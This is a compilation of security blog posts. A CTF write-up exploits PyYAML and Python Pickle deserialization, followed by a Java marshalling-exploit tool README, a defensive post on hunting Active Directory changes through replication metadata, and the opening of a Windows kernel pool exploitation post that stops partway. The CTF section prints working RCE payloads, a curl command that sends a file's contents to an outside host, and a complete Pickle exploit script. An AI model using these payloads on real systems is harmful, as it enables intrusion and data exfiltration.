Exploiting Python Deserialization Vulnerabilities
Over the weekend, I had a chance to participate in the ToorConCTF (https://twitter.com/toorconctf) which gave me my first experience with serialization flaws in Python. Two of the challenges we solved included Python libraries that appeared to be accepting serialized objects and ended up being vulnerable to Remote Code Execution (RCE). Since I struggled a bit to find reference material online on the subject, I decided to make a blog post documenting my discoveries, exploit code and solutions. In this blog post, I will cover how to exploit deserialization vulnerabilities in the PyYAML (a Python YAML library) and Python Pickle libraries (a Python serialization library). Let's get started!
Background
Before diving into the challenges, it's probably important to start with the basics. If you are unfamiliar with deserialization vulnerabilities, the following excerpt from @breenmachine at Fox Glove Security (https://foxglovesecurity.com) probably explains it best.
"Unserialize vulnerabilities are a vulnerability class. Most programming languages provide built-in ways for users to output application data to disk or stream it over the network. The process of converting application data to another format (usually binary) suitable for transportation is called serialization. The process of reading data back in after it has been serialized is called unserialization. Vulnerabilities arise when developers write code that accepts serialized data from users and attempt to unserialize it for use in the program. Depending on the language, this can lead to all sorts of consequences, but most interesting, and the one we will talk about here is remote code execution."
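The round trip described above can be illustrated with a minimal Python sketch using the standard-library pickle module (the data and field names here are invented for the example):

```python
import pickle

# Serialization: convert application data into a byte stream
# suitable for storage or transport over the network.
profile = {"user": "alice", "roles": ["admin"]}
blob = pickle.dumps(profile)

# Unserialization: read the byte stream back into live objects.
# If `blob` came from an untrusted user instead of our own code,
# this is exactly where a deserialization vulnerability triggers.
restored = pickle.loads(blob)

print(restored == profile)
```

The danger comes entirely from the second step: the format can encode instructions for reconstructing objects, not just plain data.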
PyYAML Deserialization Remote Code Execution
In the first challenge, we were presented with a URL to a web page which included a YAML document upload form. After Googling for YAML document examples, I crafted the following YAML file and proceeded to upload it to get a feel for the functionality of the form.
HTTP Request
POST / HTTP/1.1
Host: ganon.39586ebba722e94b.ctf.land:8001
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://ganon.39586ebba722e94b.ctf.land:8001/
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------200783363553063815533894329
Content-Length: 857

-----------------------------200783363553063815533894329
Content-Disposition: form-data; name="file"; filename="test.yaml"
Content-Type: application/x-yaml

---
# A list of global configuration variables
#
# Uncomment lines as needed to edit default settings.
#
# Note this only works for settings with default values. Some commands like --rerun <module>
# or --force-ccd n will have to be set in the command line (if you need to)
#
# This line is really important to set up properly
project_path: '/home/user'
#
# The rest of the settings will default to the values set unless you uncomment and change them
#resize_to: 2048
'test'
-----------------------------200783363553063815533894329
Content-Disposition: form-data; name="upload"

-----------------------------200783363553063815533894329--

HTTP Response

HTTP/1.1 200 OK
Server: gunicorn/19.7.1
Date: Sun, 03 Sep 2017 02:50:16 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 2213
Set-Cookie: session=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/

<!-- begin message block -->
<div class="container flashed-messages">
  <div class="row">
    <div class="col-md-12">
      <div class="alert alert-info" role="alert">
        test.yaml is valid YAML
      </div>
    </div>
  </div>
</div>
<!-- end message block -->
</div>
</div>
<div class="container main" >
  <div class="row">
    <div class="col-md-12 main">
      <code></code>
As you can see, the document was uploaded successfully but only displayed whether the upload was a valid YAML document or not. At this point, I wasn't sure exactly what I was supposed to do, but after looking more closely at the response, I noticed that the server was running gunicorn/19.7.1...
A quick search for gunicorn revealed that it is a Python web server, which led me to believe the YAML parser was in fact a Python library. From here, I decided to search for Python YAML vulnerabilities and discovered a few blog posts referencing PyYAML deserialization flaws. It was here that I came across the following exploit code for exploiting PyYAML deserialization vulnerabilities. The important thing here is the following payload, which runs the 'ls' command if the application is vulnerable to PyYAML deserialization:
!!map {
  ? !!str "goodbye"
  : !!python/object/apply:subprocess.check_output [ !!str "ls", ],
}
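The reason this tag is dangerous: PyYAML's default loader historically resolved !!python/object/apply:<callable> by actually invoking that callable with the supplied arguments. A small sketch of the safe-versus-unsafe behavior (this requires the third-party PyYAML package; modern versions make the dangerous behavior opt-in via UnsafeLoader, and a harmless os.getcwd call stands in for the shell command):

```python
import os
import yaml  # PyYAML (third-party package)

payload = "!!python/object/apply:os.getcwd []"

# safe_load only constructs plain types (maps, lists, strings, ...)
# and rejects the python/object/apply constructor outright.
try:
    yaml.safe_load(payload)
    blocked = False
except yaml.YAMLError:
    blocked = True

# The unsafe loader resolves the tag by calling os.getcwd() --
# the same primitive the CTF payload abuses with subprocess.
result = yaml.load(payload, Loader=yaml.UnsafeLoader)
print(blocked, result)
```

In other words, the vulnerable application was almost certainly calling the equivalent of the unsafe loader on the uploaded document.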
Going blind into the exploitation phase, I decided to give it a try and inject the payload into the document contents being uploaded using Burp Suite...
HTTP Request
POST / HTTP/1.1
Host: ganon.39586ebba722e94b.ctf.land:8001
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://ganon.39586ebba722e94b.ctf.land:8001/
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------200783363553063815533894329
Content-Length: 445

-----------------------------200783363553063815533894329
Content-Disposition: form-data; name="file"; filename="test.yaml"
Content-Type: application/x-yaml

---
!!map {
  ? !!str "goodbye"
  : !!python/object/apply:subprocess.check_output [ !!str "ls", ],
}
-----------------------------200783363553063815533894329
Content-Disposition: form-data; name="upload"

-----------------------------200783363553063815533894329--

HTTP Response (snippet)

<ul><li><code>goodbye</code> : <code>Dockerfile README.md app.py app.pyc bin boot dev docker-compose.yml etc flag.txt home lib lib64 media mnt opt proc requirements.txt root run sbin srv static sys templates test.py tmp usr var </code></li></ul>
As you can see, the payload worked and we now have code execution on the target server! Now, all we need to do is read the flag.txt...
I quickly discovered that the above method was strictly limited to single commands (i.e. ls, whoami, etc.), which meant there was no way to read the flag that way. I then discovered that the os.system Python call could also be used to achieve RCE and was capable of running multiple commands inline. However, I was quickly disappointed after trying this and seeing that the result just returned "0" with no command output. After struggling to find the solution, my teammate @n0j pointed out that os.system ["command_here"] only returns a "0" exit code if the command is successful, and is blind due to how Python handles sub-process execution. It was here that I tried injecting the following command to read the flag: curl https://crowdshield.com/?`cat flag.txt`
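The difference between the two primitives is easy to see locally. A quick sketch with harmless commands substituted for the CTF ones (POSIX shell assumed):

```python
import os
import subprocess

# subprocess.check_output captures and returns the command's stdout --
# which is why the earlier YAML payload could display directory listings.
out = subprocess.check_output(["echo", "hello"])

# os.system only returns the process exit status; the command's output
# goes to the *server's* stdout, so the attack is blind. 0 means success.
status = os.system("echo hello > /dev/null")

print(out, status)
```

This is why exfiltrating the flag via an outbound curl request (with the flag embedded in the URL) was necessary: the exit code alone tells you nothing.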
HTTP Request
POST / HTTP/1.1
Host: ganon.39586ebba722e94b.ctf.land:8001
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://ganon.39586ebba722e94b.ctf.land:8001/
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------200783363553063815533894329
Content-Length: 438

-----------------------------200783363553063815533894329
Content-Disposition: form-data; name="file"; filename="test.yaml"
Content-Type: application/x-yaml

---
"goodbye": !!python/object/apply:os.system ["curl https://crowdshield.com/?`cat flag.txt`"]
-----------------------------200783363553063815533894329
Content-Disposition: form-data; name="upload"

-----------------------------200783363553063815533894329--

HTTP Response (snippet)

</div>
<div class="container main" >
  <div class="row">
    <div class="col-md-12 main">
      <ul><li><code>goodbye</code> : <code>0</code></li></ul>
    </div>
  </div>
</div>
After much trial and error, the flag was ours along with 250pts in the CTF!
Remote Apache Logs
34.214.16.74 - - [02/Sep/2017:21:12:11 -0700] "GET /?ItsCaptainCrunchThatsZeldasFavorite HTTP/1.1" 200 1937 "-" "curl/7.38.0"
Python Pickle Deserialization
In the next CTF challenge, we were provided a host and port to connect to (ganon.39586ebba722e94b.ctf.land:8000). After the initial connection, however, no noticeable output was displayed, so I proceeded to fuzz the open port with random characters and HTTP requests to see what happened. It wasn't until I tried injecting a single "'" character that I received the error below:
# nc -v ganon.39586ebba722e94b.ctf.land 8000
ec2-34-214-16-74.us-west-2.compute.amazonaws.com [34.214.16.74] 8000 (?) open
cexceptions
AttributeError
p0
(S"Unpickler instance has no attribute 'persistent_load'"
p1
tp2
Rp3
.
The thing that stood out most was the (S"Unpickler instance has no attribute 'persistent_load'" portion of the output. I immediately searched Google for the error which revealed several references to Python's serialization library called "Pickle".
It soon became clear that exploiting another Python deserialization flaw was likely the way to obtain the flag. I then searched Google for "Python Pickle deserialization exploits" and discovered a similar PoC to the code below. After tinkering with the code a bit, I had a working exploit that would send Pickle-serialized objects to the target server with the commands of my choice.
Exploit Code
# !/usr/bin/python
# Python Pickle De-serialization Exploit by 1N3@CrowdShield - https://crowdshield.com
#
import cPickle
import socket
import os

# Exploit that we want the target to unpickle
class Exploit(object):
    def __reduce__(self):
        # Note: this will only list files in your directory.
        # It is a proof of concept.
        return (os.system, ('curl https://crowdshield.com/.injectx/rce.txt?`cat flag.txt`',))

def serialize_exploit():
    shellcode = cPickle.dumps(Exploit())
    return shellcode

def insecure_deserialize(exploit_code):
    cPickle.loads(exploit_code)

if __name__ == '__main__':
    shellcode = serialize_exploit()
    print shellcode

    soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    soc.connect(("ganon.39586ebba722e94b.ctf.land", 8000))
    print soc.recv(1024)
    soc.send(shellcode)
    print soc.recv(1024)
    soc.close()
Exploit PoC
# python python_pickle_poc.py
cposix
system
p1
(S"curl https://crowdshield.com/rce.txt?`cat flag.txt`"
p2
tp3
Rp4
.
Much to my surprise, this worked and I could see the contents of the flag in my Apache logs!
Remote Apache Logs
34.214.16.74 - - [03/Sep/2017:11:15:02 -0700] "GET /rce.txt?UsuallyLinkPrefersFrostedFlakes HTTP/1.1" 404 2102 "-" "curl/7.38.0"
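Stepping back, the primitive at the core of the exploit above is pickle's __reduce__ hook: whatever (callable, args) tuple it returns gets invoked during unpickling. This can be demonstrated safely with a harmless callable (Python 3 shown here; the original PoC used Python 2's cPickle):

```python
import os
import pickle

class Demo(object):
    def __reduce__(self):
        # On pickle.loads, this tuple becomes the call os.getcwd() --
        # the exploit above returns (os.system, ('curl ...',)) instead.
        return (os.getcwd, ())

blob = pickle.dumps(Demo())
result = pickle.loads(blob)  # the callable runs here, during unpickling
print(result)
```

Note that the unpickler never gives back a Demo instance at all; it just runs the recipe the attacker serialized. This is why pickle should never be used on untrusted input.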
Conclusion
So there you have it. Two practical examples of Python deserialization exploitation which can be used to obtain Remote Code Execution (RCE) in remote applications. I had a lot of fun competing in the CTF and learned a lot in the process, but due to other obligations and time constraints I wasn't able to put my entire focus into the CTF. In the end, our team "SavageSubmarine" placed 7th overall with @hackerbyhobby, @baltmane and @n0j (http://n0j.github.io/). Till next time...
-1N3
Published by CrowdShield on 09/04/2017
Source: https://crowdshield.com/blog.php?name=exploiting-python-deserialization-vulnerabilities
-
Java Unmarshaller Security - Turning your data into code execution
Paper
It's been more than two years since Chris Frohoff and Gabriel Lawrence presented their research into Java object deserialization vulnerabilities, ultimately resulting in what can be readily described as the biggest wave of remote code execution bugs in Java history.
Research into that matter indicated that these vulnerabilities are not exclusive to mechanisms as expressive as Java serialization or XStream, but some could possibly be applied to other mechanisms as well.
This paper presents an analysis, including exploitation details, of various Java open-source marshalling libraries that allow(ed) for unmarshalling of arbitrary, attacker-supplied types, and shows that no matter how this process is performed and what implicit constraints are in place, it is prone to similar exploitation techniques.
Full paper is at marshalsec.pdf
Disclaimer
All information and code is provided solely for educational purposes and/or testing your own systems for these vulnerabilities.
Usage
Java 8 required. Build using maven:

mvn clean package -DskipTests

Run as:

java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.<Marshaller> [-a] [-v] [-t] [<gadget_type> [<arguments...>]]
where
- -a - generates/tests all payloads for that marshaller
- -t - runs in test mode, unmarshalling the generated payloads after generating them.
- -v - verbose mode, e.g. also shows the generated payload in test mode.
- gadget_type - Identifier of a specific gadget, if left out will display the available ones for that specific marshaller.
- arguments - Gadget specific arguments
Payload generators for the following marshallers are included:
Marshaller          Gadget Impact
BlazeDSAMF(0|3|X)   JDK only escalation to Java serialization; various third party library RCEs
Hessian|Burlap      various third party RCEs
Castor              dependency library RCE
Jackson             possible JDK only RCE, various third party RCEs
Java                yet another third party RCE
JsonIO              JDK only RCE
JYAML               JDK only RCE
Kryo                third party RCEs
KryoAltStrategy     JDK only RCE
Red5AMF(0|3)        JDK only RCE
SnakeYAML           JDK only RCEs
XStream             JDK only RCEs
YAMLBeans           third party RCE
-
Co-founder of Empire/BloodHound/Veil-Framework | PowerSploit developer | Microsoft PowerShell MVP | Security at the misfortune of others | http://specterops.io | Sep 6
Hunting With Active Directory Replication Metadata
With the recent release of BloodHound’s ACL Attack Path Update as well as the work on Active Directory DACL backdooring by @_wald0 and myself (whitepaper here), I started to investigate ACL-based attack paths from a defensive perspective. Sean Metcalf has done some great work concerning Active Directory threat hunting (see his 2017 BSides Charm “Detecting the Elusive: Active Directory Threat Hunting” presentation) and I wanted to show how replication metadata can help in detecting this type of malicious activity.
Also, after this post had been drafted, Grégory LUCAND pointed out to me the extensive article (in French) he authored on the same subject area titled “Metadata de réplication et analyse Forensic Active Directory (fr-FR)”. He walks through detecting changes to an OU, as well as an excellent deep dive (deeper than this article) into how some of the replication components work such as linked value replication. I highly recommend you check his post out, even if you have to use Google Translate as I did :)
I’ll dive into some background concerning domain replication metadata and then will break down each ACL attack primitive and how you can hunt for these modifications. Unfortunately, replication metadata can be a bit limited, but it can at least help us narrow down the modification event that took place as well as the domain controller the event occurred on.
Note: all examples here use my test domain which runs at a Windows 2012 R2 domain functional level. Other functional domain versions will vary. Also, all examples were done in a lab context, so exact behavior in a real network will vary as well.
Active Directory Replication Metadata
When a change is made to a domain object on a domain controller in Active Directory, those changes are replicated to other domain controllers in the same domain (see the “Directory Replication” section here). As part of the replication process, metadata about the replication is preserved in two constructed attributes, that is, attributes where the end value is calculated from other attributes. These two properties are msDS-ReplAttributeMetaData and msDS-ReplValueMetaData.
Sidenote: previous work I found on replication metadata includes this article on tracking UPN modification as well as this great series of articles on different use cases for this data. These articles show how to use both REPADMIN /showobjmeta as well as the Active Directory cmdlets to enumerate and parse the XML formatted data returned. A few months ago, I pushed a PowerView commit that simplifies this enumeration process, and I’ll demonstrate these new functions throughout this post.
msDS-ReplAttributeMetaData
First off, how do we know which attributes are replicated? Object attributes are themselves represented in the forest schema and include a systemFlags attribute that contains various meta-settings. This includes the FLAG_ATTR_NOT_REPLICATED flag, which indicates that the given attribute should not be replicated. We can use PowerView to quickly enumerate all of these non-replicated attributes using a bitwise LDAP filter to check for this flag:
Get-DomainObject -SearchBase 'ldap://CN=schema,CN=configuration,DC=testlab,DC=local' -LDAPFilter '(&(objectClass=attributeSchema)(systemFlags:1.2.840.113556.1.4.803:=1))' | Select-Object -Expand ldapdisplayname
If we want attributes that ARE replicated, we can just negate the bitwise filter:
Get-DomainObject -SearchBase 'ldap://CN=schema,CN=configuration,DC=testlab,DC=local' -LDAPFilter '(&(objectClass=attributeSchema)(!systemFlags:1.2.840.113556.1.4.803:=1))' | Select-Object -Expand ldapdisplayname
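The 1.2.840.113556.1.4.803 matching rule used in both filters is a bitwise AND: an attribute matches when all of the named bits are set in its systemFlags value. The logic reduces to a couple of lines of Python (the flag value is the real FLAG_ATTR_NOT_REPLICATED bit, but the sample attribute/flag pairs below are illustrative, not pulled from a live schema):

```python
FLAG_ATTR_NOT_REPLICATED = 0x1  # the bit the LDAP filters above test

# Illustrative (ldapDisplayName, systemFlags) pairs.
attributes = [
    ("badPwdCount", 0x1),   # not replicated
    ("description", 0x0),   # replicated
    ("lastLogon",   0x11),  # not replicated (bit 0 set among others)
]

# Equivalent of (systemFlags:1.2.840.113556.1.4.803:=1)
not_replicated = [n for n, f in attributes if f & FLAG_ATTR_NOT_REPLICATED]
# Equivalent of (!systemFlags:1.2.840.113556.1.4.803:=1)
replicated = [n for n, f in attributes if not f & FLAG_ATTR_NOT_REPLICATED]

print(not_replicated, replicated)
```
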
So changes to any of the attributes in the above set on an object are replicated to other domain controllers, and, therefore, have replication metadata information in msDS-ReplAttributeMetaData (except for linked attributes, more on that shortly). Since this is a constructed attribute, we have to specify that the property be calculated during our LDAP search. Luckily, you can already do this with PowerView by specifying -Properties msDS-ReplAttributeMetaData for any of the Get-Domain* functions:
You can see that we get an array of XML text blobs that describes the modification events. PowerView’s brand new Get-DomainObjectAttributeHistory function will automatically query msDS-ReplAttributeMetaData for one or more objects and parse out the XML blobs into custom PSObjects:
Breaking down each result, we have the distinguished name of the object itself, the name of the replicated attribute, the last time the attribute was changed (LastOriginatingChange), the number of times the attribute has changed (Version), and the directory service agent distinguished name the change originated from (LastOriginatingDsaDN). The "Sidenote: Resolving LastOriginatingDsaDN" section at the end of this post shows how to resolve this distinguished name to the appropriate domain controller object itself. Unfortunately, we don't get who made the change, or what the previous attribute value was; however, there are still a few interesting things we can do with this data, which I'll show in a bit.
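Under the hood, this parsing step is just XML handling. A rough Python equivalent for a single DS_REPL_ATTR_META_DATA blob (the element names follow the replication-metadata XML format the constructed attribute returns, but the values in this sample are made up):

```python
import xml.etree.ElementTree as ET

# One invented metadata entry of the kind returned in msDS-ReplAttributeMetaData.
blob = """
<DS_REPL_ATTR_META_DATA>
  <pszAttributeName>servicePrincipalName</pszAttributeName>
  <dwVersion>2</dwVersion>
  <ftimeLastOriginatingChange>2017-09-05T17:53:01Z</ftimeLastOriginatingChange>
  <pszLastOriginatingDsaDN>CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=local</pszLastOriginatingDsaDN>
</DS_REPL_ATTR_META_DATA>
"""

# Flatten the child elements into a simple dict, as PowerView does
# when it converts each blob into a custom PSObject.
root = ET.fromstring(blob)
entry = {child.tag: child.text for child in root}

print(entry["pszAttributeName"], entry["dwVersion"])
```
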
msDS-ReplValueMetaData
In order to understand msDS-ReplValueMetaData and why it's separate from msDS-ReplAttributeMetaData, you need to understand linked attributes in Active Directory. Introduced with the Windows Server 2003 domain functional level, linked value replication "allows individual values of a multivalued attribute to be replicated separately." In English: attributes that are constructed/depend on other attributes were broken out in such a way that bits of the whole could be replicated one by one, instead of the entire grouping all at once. This was introduced in order to cut down on replication traffic in modern domain environments.
With linked attributes, Active Directory calculates the value of a given attribute, referred to as the back link, from the value of another attribute, referred to as the forward link. The best example of this is member / memberof for group memberships: the member property of a group is the forward link while the memberof property of a user is the backward link. When you enumerate the memberof property for a user, the backlinks are crawled to produce the final membership set.
There are two additional caveats about forward/backwards links you should be aware of. First, forward links are writable, while backlinks are not, so when a forward-linked attribute is changed the value of the associated backlink property is updated automatically. Second, because of this, only forward-linked attributes are replicated between domains, which then automatically calculate the backlinks. For more information, check out this great post on the subject.
A huge advantage for us is that because forward-linked attributes are replicated in this way, the previous values of these attributes are stored in replication metadata. This is exactly what the msDS-ReplValueMetaData constructed attribute stores, again in XML format. The new Get-DomainObjectLinkedAttributeHistory PowerView function wraps this all up for you:
We now know that member/memberof is a linked set, hence the modification results to member above.
In order to enumerate all forward-linked attributes, we can again examine the forest schema. Linked properties have a Link and LinkID in the schema — forward links have an even/nonzero value while back links have an odd/nonzero value. We can grab the current schema with [DirectoryServices.ActiveDirectory.ActiveDirectorySchema]::GetCurrentSchema() and can then use the FindAllClasses() method to enumerate all the current schema classes. If we filter by class properties that are even, we can find all linked properties that therefore have their previous values replicated in Active Directory metadata.
There are a lot of results here, but the main ones we likely care about are member/memberOf and manager/directReports, unfortunately. So member and manager are the only interesting properties for an object we can track previous modification values on. However, like with msDS-ReplAttributeMetaData, we unfortunately can’t see who actually initiated the change.
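The even/odd LinkID convention described above can be captured in a few lines (the member/memberOf and manager/directReports LinkID values below are the well-known 2/3 and 42/43 pairs):

```python
def is_forward_link(link_id):
    # Forward links carry even, nonzero LinkIDs; the paired back link
    # is link_id + 1 (odd). Non-linked attributes have no LinkID at all.
    return link_id != 0 and link_id % 2 == 0

links = {"member": 2, "memberOf": 3, "manager": 42, "directReports": 43}
forward = sorted(n for n, lid in links.items() if is_forward_link(lid))
print(forward)
```

Only the forward-linked side (member, manager) is writable and replicated, which is exactly why previous values for those attributes survive in msDS-ReplValueMetaData.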
Hunting With Replication Metadata
Alright, so we have a bunch of this seemingly random replication metadata, how the hell do we actually use this to “find bad?” Metadata won’t magically tell you an entire story, but I believe it can start to point you in the right direction, with the added bonus of being pre-existing functionality already present in your domain. I’ll break down the process for hunting for each ACL attack primitive that @_wald0 and myself covered, but for most situations the process will be:
- Use Active Directory replication metadata to detect changes to object properties that might indicate malicious behavior.
- Collect detailed event logs from the domain controller linked to the change (as indicated by the metadata) in order to track down who performed the modification and what the value was changed to.
There’s one small exception to this process:
Group Membership Modification
This one is the easiest. The control relationship for this is the right to add members to a group (WriteProperty to Self-Membership) and the attack primitive through PowerView is Add-DomainGroupMember. Let’s see what the information from Get-DomainObjectLinkedAttributeHistory can tell us:
In the first entry, we see that ‘EvilUser’ was originally added (TimeCreated) at 21:13 and is still present (TimeDeleted == the epoch). Version being 3 means that the EvilUser was originally added at TimeCreated, deleted at some point, and then readded at 17:53 (LastOriginatingChange). Big note: these timestamps are in UTC!
In the second example, TestOUUser was added to the group at 21:12 (TimeCreated) and removed at 21:19 (TimeDeleted). The Version being even, as well as the non-epoch TimeDeleted value, means that this user is no longer present in the group and was removed at the indicated time. PowerView’s last new function, Get-DomainGroupMemberDeleted, will return just metadata components indicating deleted users:
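The parity heuristic that Get-DomainGroupMemberDeleted applies can be sketched as follows (the epoch sentinel and field names mirror the metadata described above; the sample entries themselves are invented):

```python
EPOCH = "1601-01-01T00:00:00Z"  # AD's zero FILETIME: "never deleted" sentinel

def was_removed(version, time_deleted):
    # Each add or remove bumps Version, starting at 1 on the first add:
    #   odd Version  -> principal is currently a member
    #   even Version -> the last operation was a removal (TimeDeleted is real)
    return version % 2 == 0 and time_deleted != EPOCH

entries = [
    {"member": "EvilUser",   "Version": 3, "TimeDeleted": EPOCH},
    {"member": "TestOUUser", "Version": 2, "TimeDeleted": "2017-09-02T21:19:00Z"},
]
deleted = [e["member"] for e in entries
           if was_removed(e["Version"], e["TimeDeleted"])]
print(deleted)
```
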
If we want more details, we have the Directory System Agent (DSA) where the change originated, meaning the domain controller in this environment that handled the modification (PRIMARY here). Since we have the group that was modified (TestGroup) and the approximate time the change occurred (21:44 UTC), we can go to the domain controller that initiated the change (PRIMARY) to pull more event log detail (see the “Sidenote: Resolving LastOriginatingDsaDN” section for more detail on this process).
The auditing we really want isn’t on by default, but can be enabled with “Local Computer Policy -> Computer Configuration -> Windows Settings -> Security Settings -> Advanced Audit Policy Configuration -> Account Management -> Audit Security Group Management”:
This will result in event log IDs of 4735/4737/4755 for modifications to domain local, global, and universally scoped security groups:
We can see in the event detail that TESTLAB\dfm.a is the principal who initiated the change, which correlates with the deletion event we observed in the replication metadata.
User Service Principal Name Modification
This is also another interesting case. The vast majority of users will never have a service principal name (SPN) set unless the account is registered to… run a service. SPN modification is an attack primitive that I’ve spoken about before, and grants us a great opportunity to take advantage of the “Version” field of the metadata, i.e. the number of times a property has been modified.
If we set and then unset a SPN on a user, the Version associated with the attribute metadata will be even, indicating there used to be a value set:
If we enable the “Audit User Account Management” and “Audit Computer Account Management” settings, we can grab more detailed information about the changes:
The event ID will be 4738, but the event log detail unfortunately does not break out the value of servicePrincipalName on change. However, we do again get the principal who initiated the change:
Note the logged timestamp of the event matches the LastOriginatingChange of the replication metadata. If we wanted to do a mass enumeration of EVERY user account that had a SPN set and then deleted, we can use -LDAPFilter ‘(samAccountType=805306368)’ -Properties servicePrincipalName, and filtering out anything with an odd Version:
Object Owner/DACL Modification
I originally thought this scenario would be tough as well, as I had guessed that whenever delegation is changed on an OU, those new rights were reflected in the ntSecurityDescriptor of any user objects down the inheritance chain. However, I was mistaken: any delegation changes are stored in the ntSecurityDescriptor of the OU/container, and I believe those inherited rights are calculated on LDAP enumeration by the server. In other words, the ntSecurityDescriptor of user/group/computer objects should only change when the owner is explicitly changed, or a new ACE is manually added to that object.
Since an object's DACL and owner are both stored in ntSecurityDescriptor, and the event log data doesn't provide details on the previous/changed value, we have no way of knowing if it was a DACL-based or owner-based change. However, we can still figure out who initiated the change, again using event 4738:
Just like with SPNs, we can also sweep for any users (or other objects) that had their DACL or owner changed (i.e. Version > 1):
If we periodically enumerate all of this data for all users/other objects, we can start to timeline and calculate change deltas, but that’s for another post :)
User Password Reset
Unfortunately, this is probably the hardest scenario. Since password changes/resets are a fairly common occurrence, it’s difficult to reliably pull a pattern out of the data based solely on the password last set time. Luckily however, enabling the “Audit User Account Management” policy also produces event 4723 (a user changed their own password) and event 4724 (a password reset was initiated):
And we get the time of the reset, the user that was force-reset, and the principal that initiated it!
Group Policy Object Editing
If you’re able to track down a malicious GPO edit, and want to know the systems/users affected, I’ve talked about that process as well. However, this section will focus on trying to identify what file was edited and by whom.
Every time a GPO is modified, the versionNumber property is increased. So if we pull the attribute metadata concerning the last time versionNumber was modified, and correlate this time (as a range) with edits to all files and folders in the SYSVOL path we can identify the files that were likely modified by the last edit to the GPO. Here’s how we might accomplish that:
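As a rough Python sketch of that correlation step (the PowerShell in the original post does the real work; the paths and timestamps below are invented, and the window size is a judgment call):

```python
from datetime import datetime, timedelta

# When the GPO's versionNumber attribute last changed (from the metadata).
version_change = datetime(2017, 9, 5, 17, 53, 1)

# Hypothetical SYSVOL files under the GPO's folder, with last-write times.
sysvol_files = {
    r"Machine\Preferences\Groups\Groups.xml": datetime(2017, 9, 5, 17, 53, 0),
    r"GPT.INI":                               datetime(2017, 9, 5, 17, 53, 1),
    r"Machine\Registry.pol":                  datetime(2017, 8, 1, 9, 0, 0),
}

# Any file written within a small window of the versionNumber bump
# was likely part of the same edit.
window = timedelta(seconds=10)
likely_edited = sorted(
    path for path, mtime in sysvol_files.items()
    if abs(mtime - version_change) <= window
)
print(likely_edited)
```
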
You can see above that the Groups.xml group policy preferences file was likely the file edited. To identify what user made the changes, we need to tweak “Local Computer Policy -> Computer Configuration -> Windows Settings -> Security Settings -> Advanced Audit Policy Configuration -> DS Access -> Audit Active Directory Service Changes”:
We can then comb for event ID 5136 and use the alert data to narrow down the event that caused the versionNumber modification:
We see the distinguishedName of the GPO object being modified, as well as who initiated the change. There is some more information here in case you’re interested.
Sidenote: Resolving LastOriginatingDsaDN
As I previously mentioned, the LastOriginatingDsaDN property indicates the last directory service agent that the given change originated from. For us to make the most use of this information, we want to map this particular DSA record back to the domain controller it's running on. This is unfortunately a multi-step process, but I'll walk you through it below using PowerView.
Say the change we want to track back is the following deleted Domain Admin member:
We see that the DSA distinguished name exists in the CN=Configuration container of the associated domain. We can retrieve the full object this references by using PowerView’s Get-DomainObject with the -SearchBase set to “ldap://CN=Configuration,DC=testlab,DC=local”:
We see above that this has a NTDS-DSA object category, and we see a serverreferencebl (backlink) property that points us in the right direction. If we resolve this new object DN, we get the following:
Now we see the actual domain controller distinguished name linked in the msdfsr-computerreference property of this new result, and the serverreference matches the LastOriginatingDsaDN from our initial result. This means we can skip that middle step and query for this ms-DFSR-Member object directly, linked by the serverreference attribute, by way of a custom LDAP filter. To finish, we can extract the msdfsr-computerreference property and resolve it to the actual domain controller object:
Success! \m/
Wrapup
Hopefully this causes at least a few people to think about the hunting/forensic possibilities from the Active Directory side. There’s a wealth of opportunity here to detect our ACL based attack components, as well as a myriad of other Active Directory “bad”. Also, observant readers may have noticed that I ignored an entire defensive component here, system access control lists (SACLs), which provide that chance to implement additional auditing. I’ll cover SACLs in a future post, showing how to utilize BloodHound to identify “key terrain” to place very specific SACL auditing rules.
Until then, have fun!
Originally published at harmj0y.
Source: https://posts.specterops.io/hunting-with-active-directory-replication-metadata-1dab2f681b19
-
Sharks in the Pool :: Mixed Object Exploitation in the Windows Kernel Pool
Sep 6, 2017
This year at Blackhat, I attended the Advanced Windows Exploitation (AWE) class. It's a hands-on class teaching Windows exploitation, and whilst I'm relatively well versed in usermode exploitation, I needed to get up to speed on Windows kernel exploitation. If you haven't taken the class, I encourage you to!
TL;DR
I explain a basic kernel pool overflow vulnerability and how you can exploit it by overwriting the TypeIndex after spraying the kernel pool with a mix of kernel objects.
Introduction
So, after taking the AWE course I really wanted to find and exploit a few kernel vulnerabilities. Whilst I think the HackSys Extreme Vulnerable Driver (HEVD) is a great learning tool, for me, it doesn’t work. I have always enjoyed finding and exploiting vulnerabilities in real applications as they present a hurdle that is often not so obvious.
Since taking the course, I have been very slowly (methodically, almost insanely) developing a Windows kernel device driver fuzzer. Using this private fuzzer (eta wen publik jelbrek?), I found the vulnerability presented in this post. The technique demonstrated for exploitation is nothing new, but its slight variation allows an attacker to exploit basically any pool size. This blog post is mostly a reference for myself, but hopefully it benefits someone else attempting pool exploitation for the first time.
The vulnerability
After testing a few SCADA products, I came across a third party component called “WinDriver”. After a short investigation I realized this is Jungo’s DriverWizard WinDriver. This product is bundled and shipped in several SCADA applications, often with an old version too.
After installation, it installs a device driver named windrvr1240.sys to the standard Windows driver folder. With some basic reverse engineering, I found several ioctl codes that I plugged directly into my fuzzer’s config file.
{ "ioctls_range":{ "start": "0x95380000", "end": "0x9538ffff" } }
Then, I enabled special pool using
